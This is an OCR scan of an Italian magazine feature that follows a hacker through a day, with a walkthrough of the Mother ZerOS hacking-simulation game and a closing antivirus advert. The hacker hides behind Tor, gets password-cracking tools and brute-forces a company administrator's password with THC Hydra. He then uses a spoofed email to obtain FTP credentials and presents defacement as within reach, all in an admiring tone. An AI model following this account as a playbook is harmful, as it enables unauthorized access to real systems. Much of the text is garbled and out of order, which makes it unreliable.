HACKER AL LAVORO 

Permettere in pratica le tecniche proibitedi un 
attacco informatico, abbiamo vissuto un’intera 
giornata di fianco ad un hackereal suo fido com¬ 
puter. Ecco quello che abbiamo imparato. 

È presto per entrare in azione! 

Non scherziamo: non sia mai 
che un hacker, a quest'ora, è 
già sveglio! La notte si tira tardi e visto 
che la mente deve essere lucida, meglio 
dedicare non meno di sette ore al riposo. 
Dopotutto, è uno dei due ingredienti per 
lubrificare al meglio il cervello... 
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Facciamo scorta di buone energie 

... il secondo, ovviamente, è la 
colazione. Bella ricca di zuc¬ 
cheri, perché il glucosio dà lo sprint deci¬ 
sivo ai neuroni. A questo punto, Kevin si 
mette davvero al lavoro. 11 computer, per 
agevolare la spiegazione e fornire sugge¬ 
rimenti e spunti utili anche ai mono esper¬ 
ti, non ha software smanettoni «fas#]Pial¬ 
lati ed è dotato di Windows 7. Nel 
parte dei casi, comunque, ne usa un a 
con Linux, più utilizzato e "adattabile” per 
questi scopi. Anche il sistema operativo 
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talmente complessa da far desistere gli 
interessati. Una volta scaricato e installa¬ 
to il programma, Kevin naviga dunque 
liberamente su 1 Web, senza timore di poter 
essere rintracciato. “L'anonimato, anche 
se non è mai garantito al 100%, è la prio¬ 
rità assoluta per un hacker ", si affretta a 
dirci. 

Il grimaldello dell’hacker 

Con le spalle coperte in fatto 
di privacy, il nostro hacker. 
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innanzitutto, di un "password cracker", 
vale a dire un programma in grado di scar¬ 
dinare i sistemi di autenticazione di servi¬ 
zi Web e software che necessitano della 
classica accoppiata nome utente/password. 
"Ce ne sono di parecchi tipi, ma i migliori 
rimangono sempre Cain & Ahel (www.oxid. 
it/rain.html) e John thè Ripper(www.open 
Wall com/jnhn)". Cosi scarica il primo e, 
insieme a questo, anche THC Hydra (http: 
thc.org/thc-hydra): “è un software vecchia 
maniera, piuttosto diffìcile da installare, 
perché prima lo si deve compilare, ma poi 
consente di superare parecchi sistemi di 
protezione, e senza troppa fatica", speci¬ 
fica il nostro accompagnatore negli oscu¬ 
ri meandri dell’hacking. 
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Cain & Abel è un cosiddetto sniffer di rete che 
itte di "spiare" le comunicazioni altrui, 
rando i vari indirizzi IP. 


adesso, si gito per il download 

di software pfl^faJtotoso. Insomma, 
si tratta di quegli strtimetlistali pereffet¬ 
tuare analisi avanzate mobieniw «intru¬ 
sioni, quindi c’è da fare affdn/io ietgbi 
teoria, scaricare questi programmi noti 
rappresenta un reato, ma se qualcosa?'* 
vesse andare storto, costituirebbe una 
prova del coinvolgimento in qualche tipo 
di attacco. La sicurezza non è mai troppa. 
La lista della spesa di Kevin si compone, 


Le giuste precauzioni 

La dotazione software di base 
del perfetto hacker, in fondo, 
sta tutta qui. Ma sono i dettagli a fare la 
differenza. Dettagli che, in questo caso, 
rispondono al nome di altri programmi. 
Quello di un firewall, per esempio. Un pro¬ 
gramma, cioè, che scherma il sistema di 
Kevin dagli attacchi di altri hacker, o dai 
sistemi di difesa di alcuni servizi Web. Inu¬ 
tile dire che la scelta, in questo campo, è 
impressionante, anche se WIPFW (http: 
wipfw.sourceforge.net) rimane una delle 
soluzioni più apprezzate per chi vuole un 
filtro serio e preciso come un cecchino. F. 
Te, soprattutto, non faccia rallentaretrop- 
JtWJireziosa connessione. Nessun fire 






























V PC e Smartphone degli Hacker 
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Uno 

quello che 
propria vittima. 


mous Mail (www.senohifnvl^kiynau. 
net), e invia un messaggio alitaninijpni^a- 
tore di sistema, da parte del man^iqy Ng^ 
messaggio, chiede i dati di accesso m^iQr 
ver FTP, per caricare delle presentazioni • 
di grosse dimensioni. I servizi di fakemail, 
di solito, non permettono di ricevere le e- 
mail di risposta, ma questo a Kevin non 


■ Neanche un hacker può rinunciare ad un firewall 
con funzionalità di filtraggio dei pacchetti di dati: 
solo cosi può bloccare eventuali intrusioni nei suoi 
sistemi. 


wall, comunque, dà mai la sicurezza al 
100% di tenere alla larga i malware "spa 
rati" dalla concorrenza, ed è per questo che 
a Kevin, adesso, serve qualche protezione 
"attiva". Per esempio un antivirus: ne ser¬ 
ve uno di molto veloce, efficiente e versa¬ 
tile, e la scelta punta sul mitico Immunet 
3.0 (www.immunet.com). Si t 
software basato sul cuore 
ClamAV (www.clamav.net), 
source per eccellenza, in questo modo, 
qualche hacker nemico sarà in grado di 
infilare dei malware nel computer di Kevin, 
il prode antivirus lo rileverà ed eliminerà 
in un batter d’occhio. Già che c'è, Kevin 
scarica un paio di altri programmi: non 
riusciamo a vedere di che si tratta (e lui si 
giustifica sornione con un laconico: "se¬ 
greto professionale "), ma chissà che non 
lo scopriremo a breve. 


Una piccola pausa 

OK, l'arsenale è pronto, ma 
prima di passare all'azione... 
è meglio addentare una bella bistecca: 
si pranza! 
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ne e se ne torna con patatine e bibite, "Ci 
sarà eia attendere...’’. 

Siamo dentro al sistema... 

Ed infatti, l’attesa dura più di 
tre ore, ma alla fine la pas¬ 
sword è in manoall'hacker. Il quale, a que¬ 
sto punto, è in grado di leggere la posta 
deH’amministratoredi sistema. Spulcian¬ 
do tra le missive elettroniche, Kevin risale 
all'indirizzo e-mail di uno dei manager 
della compagnia. L'hacker, a questo punto, 
sfrutta un servizio di invio di e-mail far- 
locche (fake e-mail), come Send Anony- 


inleressa. Al nostro hacker, infatti, basta 
aspettare che l'amministratore invii la ri¬ 
sposta, per andare a sbirciare proprio nel¬ 
la sua posta inviata! 

L’attacco è riuscito! 

Bingo! In un'oretta e mezza 
l'amministratore si decide a 
rispondere. Antonio ricava i dati FTP e, di 
fatto, ha accesso al server (al quale ci si 
collega con un programma come FileZilla, 
hitp.V/fi!ezilla-pr oject.org). Quanto basta 
per eseguire un “defacement”, cioè sosti 
tuire l’home page del sito con una confe¬ 
zionata ad hoc. Ma questa è solo una di¬ 
mostrazione e il nostro hacker preferisce 
lasciare tutto com'è, non prima di essersi 
girato verso di noi, tronfio, con un sorrisi¬ 
no compiaciuto sulle labbra! 
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Rendiamoci ano/iimi in Rete 

Un quarto d'ora è la durata me¬ 
dia del pranzo del vero hacker. 
Che, anzi, di solito lo consuma davanti al 
PC. Kevin, adesso, avvia innanzitutto Tor, 
per rendersi anonimo (anche se il termine 
corretto, fa sapere, è "difficilmente rintrac¬ 
ciabile"). Quindi punta a un sito, che dice 
essere poco protetto, per mostrarci quan¬ 
to è semplice, a volte, prendere possesso 
di un sistema. Si tratta di una compagnia 
nel ramo di prodotti informatici. Nella se 
zione del rispettivo sito dedicata ai contat¬ 
ti, Kevin recupera l'indirizzo e-mail 
deU’amministratoredel sistema. Poi, sfrut¬ 
tando THC Hydra, e la parte iniziale dell'In¬ 
dirizzo come nome utente, avvia un attac¬ 
co di "forza bruta" per scovare la password. 
Curiosamente, si allontana dalla postazio- 


IZ.HZ 


96 Speciali Win Magatine 






















Svesti i panni di un hacker 

Nessuna azione di hacking a rischio di denuncia, ma una vera e propria simulazione che ci fa vivere l’ebbrezza 
di un attacco informatico a tutti gli effetti. Ecco la procedura da seguire. 
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Download Mothe» ZefOS 



Installazione fai da te 

■j 1 II simulatore scelto è Mother: per installarlo, scompariamo l'archi¬ 
vio Mother.zip (sezione Gàctù del Win CD-Rom) ed eseguiamo II 
file mother-vi. 0.exe contenuto ,jl srwjtou no. Quindi, installiamo, nell'or 
dine, le patch mother-vi.01-upgradmxe <. motppr-vl. 02-upgrade.exe 

I '' ’* rr ZtrOS - Veri, 0-4 Alp-a ’W/ 


^ Autenticarsi, prego! 

2 | Terminata l'installazione del simulatore di hacking e delle due patch di 
• aggiornamento, selezioniamo la voce di menu Start/Tutti i program- 
mi/Mother ZerOS/Mother ZerOS Failsafe In Usemamee Passwordmsem 
mo dei dati di autenticazione di fantasia e confermiamo premendo Invio 
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I nostri primi passi 

3 Nel box visualizzato clicchiamo sul pulsante OK e prepariamoci a 
- giocare. Intanto creiamo il personaggio: per esempio, clicchiamo su 
Tecnico, Procedi, Cracker, Procedi e ancora Procedi. Clicchiamo su Annul¬ 
la. Clicchiamo sull'icona M, in basso a sinistra, e poi su Network Map 


i Antivirus finto? Mi ci ficco! 

4 s Spostiamo il cursore del mouse verso destra, fino a inquadrare l'India 
- J sul mappamondo. Clicchiamo sul quadratino lampeggiante e poi, in 
basso a destra, su Connetti Nel riquadro in alto a sinistra clicchiamo su un 
primo software da scaricare (per finta): i'antivirus Zave 
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thebvtb.tndUmvar* 

* "v; 

izaveff - Advmead Z*rOS Arni Viru> Éxrentìon - vi 0 - Ifl Mbyt» • Cr 129 
proxyd - Proxy Daemon - v 1.0 -21 Mbyt* - Cr 167 
walld ■ F!r«wjll Da*mon - vl.O - 24 Mbyte - Cr: 183 
cypherd • Dati Cypher Daemon - vl.O -27 Mbyte • Cr: 223 

Ì bkservd - Net Backup Daemon - vl.O -19 Mbyte • Cr: 159 
rsbd • Remote Shell Daemon - vl.0 - 22 Mbyte - Cr: 190 
dabuggard - Debugger Service Daemon - vl.O • 27 Mbyte • Cr: 234 
v godcc - Godware Code Compiler • v12.0 - 89 Mbyt# - Cr. 49« 

* F'ootbreaker e' forse il piu .« 00010 , noto e polente password cracker mai rea zz< 



Sistemiamo le password... 

5 Clicchiamo sul pulsante Download e poi su OK per scaricarlo. Scor- 
riamo quindi l'elenco di programmi disponibili fino a individuare la 
voce rootbreaker, un tool utile trovare password. Scarichiamo anche questo. 
A questo punto clicchiamo ancora su Me selezioniamo Disconnetti. 


^ Attacco finale! 

0 Clicchiamo Me selezioniamo l’opzione Network Map Scorriamola la 
.— mappa delia rete che appare verso sinistra e clicchiamo sul quadrati¬ 
no lampeggiante che troviamo a livello degli USA. Clicchiamo Connetti Sete 
zioniamo Me Rootbreaker basterà per crackare la password del sito? 
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rivista d'informatica più 
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agile, Veloce, potente. 

L'ANTIVIRUS DEL FUTURO. OGGI 


ESET NOD32 

ANTIVIRUS 


DIVENTA RIVENDITORE™ NOD32 
AREA RIVENDITORI: WWW.NOD32.IT/PARTNERS 


DISTRIBUTORE ESCLUSIVO PER L'ITALIA: FUTURE TIME S.R.L. - ROMA 
PERQJJALSIASI INFORMAZIONE VISITA IL NOSTRO SITO WEB WWW.NOD32.IT 


tecnologie antiuirus 








